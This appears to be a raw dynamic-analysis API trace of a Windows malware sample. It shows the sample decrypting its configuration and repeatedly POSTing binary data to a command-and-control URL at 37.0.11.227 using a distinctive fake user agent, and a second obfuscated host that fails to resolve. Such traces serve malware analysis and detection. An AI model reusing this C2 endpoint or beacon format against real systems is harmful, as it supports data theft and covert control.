[0183.113] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0183.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.122] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0183.133] GetProcessHeap () returned 0x690000 [0183.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0183.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.135] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0183.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.136] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.137] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.137] GetProcessHeap () returned 0x690000 [0183.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0183.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.138] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0183.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.139] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0183.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.140] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0183.140] GetProcessHeap () returned 0x690000 [0183.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0183.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.141] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0183.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.142] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0183.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.143] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0183.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.144] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0183.144] GetProcessHeap () returned 0x690000 [0183.144] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0183.144] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9898*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0183.144] GetProcessHeap () returned 0x690000 [0183.144] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0183.144] socket (af=2, type=1, protocol=6) returned 0x304 [0183.145] connect (s=0x304, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0183.173] FreeAddrInfoW (pAddrInfo=0x6a9898*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0183.173] GetProcessHeap () returned 0x690000 [0183.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0183.173] GetProcessHeap () returned 0x690000 [0183.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0183.174] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0183.175] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0183.175] GetProcessHeap () returned 0x690000 [0183.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0183.175] GetProcessHeap () returned 0x690000 [0183.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0183.175] GetProcessHeap () returned 0x690000 [0183.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0183.176] GetProcessHeap () returned 0x690000 [0183.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0183.176] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0183.177] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0183.177] GetProcessHeap () returned 0x690000 [0183.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0183.177] GetProcessHeap () returned 0x690000 [0183.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0183.178] send (s=0x304, buf=0x6abd08*, len=242, flags=0) returned 242 [0183.178] send (s=0x304, buf=0x6aba40*, len=159, flags=0) returned 159 [0183.178] GetProcessHeap () returned 0x690000 [0183.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0183.179] recv (in: s=0x304, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0183.251] GetProcessHeap () returned 0x690000 [0183.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0183.252] GetProcessHeap () returned 0x690000 [0183.252] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0183.252] GetProcessHeap () returned 0x690000 [0183.252] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0183.252] GetProcessHeap () returned 0x690000 [0183.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0183.253] closesocket (s=0x304) returned 0 [0183.253] GetProcessHeap () returned 0x690000 [0183.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0183.253] GetProcessHeap () returned 0x690000 [0183.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0183.254] GetProcessHeap () returned 0x690000 [0183.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0183.254] GetProcessHeap () returned 0x690000 [0183.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0183.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x50c) returned 0x304 [0183.256] Sleep (dwMilliseconds=0xea60) [0183.257] GetProcessHeap () returned 0x690000 [0183.257] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0183.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.270] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0183.281] GetProcessHeap () returned 0x690000 [0183.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0183.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.282] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0183.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.283] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.284] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.284] GetProcessHeap () returned 0x690000 [0183.285] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0183.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.286] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0183.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.287] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0183.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.287] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0183.287] GetProcessHeap () returned 0x690000 [0183.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0183.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.288] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.289] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.290] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.291] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.291] GetProcessHeap () returned 0x690000 [0183.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0183.291] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0183.295] GetProcessHeap () returned 0x690000 [0183.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0183.295] GetProcessHeap () returned 0x690000 [0183.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0183.295] GetProcessHeap () returned 0x690000 [0183.296] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0183.296] GetProcessHeap () returned 0x690000 [0183.296] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0183.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.296] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0183.309] GetProcessHeap () returned 0x690000 [0183.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0183.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.310] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0183.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.311] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.312] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.312] GetProcessHeap () returned 0x690000 [0183.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0183.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.313] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0183.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.314] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0183.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.316] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0183.316] GetProcessHeap () returned 0x690000 [0183.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0183.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.317] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0183.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.317] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0183.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.318] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0183.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.319] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0183.319] GetProcessHeap () returned 0x690000 [0183.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0183.319] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9780*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0183.319] GetProcessHeap () returned 0x690000 [0183.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0183.320] socket (af=2, type=1, protocol=6) returned 0x308 [0183.320] connect (s=0x308, name=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0183.344] FreeAddrInfoW (pAddrInfo=0x6a9780*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0183.344] GetProcessHeap () returned 0x690000 [0183.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0183.344] GetProcessHeap () returned 0x690000 [0183.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0183.345] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0183.346] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0183.346] GetProcessHeap () returned 0x690000 [0183.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0183.346] GetProcessHeap () returned 0x690000 [0183.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0183.347] GetProcessHeap () returned 0x690000 [0183.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0183.347] GetProcessHeap () returned 0x690000 [0183.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0183.347] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0183.348] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0183.348] GetProcessHeap () returned 0x690000 [0183.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0183.348] GetProcessHeap () returned 0x690000 [0183.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0183.349] send (s=0x308, buf=0x6abd08*, len=242, flags=0) returned 242 [0183.349] send (s=0x308, buf=0x6aba40*, len=159, flags=0) returned 159 [0183.349] GetProcessHeap () returned 0x690000 [0183.349] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0183.349] recv (in: s=0x308, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0183.435] GetProcessHeap () returned 0x690000 [0183.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0183.437] GetProcessHeap () returned 0x690000 [0183.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0183.437] GetProcessHeap () returned 0x690000 [0183.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0183.438] GetProcessHeap () returned 0x690000 [0183.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0183.439] closesocket (s=0x308) returned 0 [0183.439] GetProcessHeap () returned 0x690000 [0183.439] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0183.439] GetProcessHeap () returned 0x690000 [0183.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0183.440] GetProcessHeap () returned 0x690000 [0183.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0183.440] GetProcessHeap () returned 0x690000 [0183.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0183.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfe8) returned 0x308 [0183.442] Sleep (dwMilliseconds=0xea60) [0183.444] GetProcessHeap () returned 0x690000 [0183.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0183.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.445] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.451] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0183.455] GetProcessHeap () returned 0x690000 [0183.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0183.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.456] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0183.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.457] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.458] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.458] GetProcessHeap () returned 0x690000 [0183.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0183.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.460] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0183.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.461] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0183.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.462] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0183.462] GetProcessHeap () returned 0x690000 [0183.462] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0183.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.463] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.463] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.464] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.465] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.465] GetProcessHeap () returned 0x690000 [0183.465] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0183.465] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0183.465] GetProcessHeap () returned 0x690000 [0183.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0183.466] GetProcessHeap () returned 0x690000 [0183.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0183.466] GetProcessHeap () returned 0x690000 [0183.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0183.467] GetProcessHeap () returned 0x690000 [0183.467] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0183.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.468] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.521] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0183.526] GetProcessHeap () returned 0x690000 [0183.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0183.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.527] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0183.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.528] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.530] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, 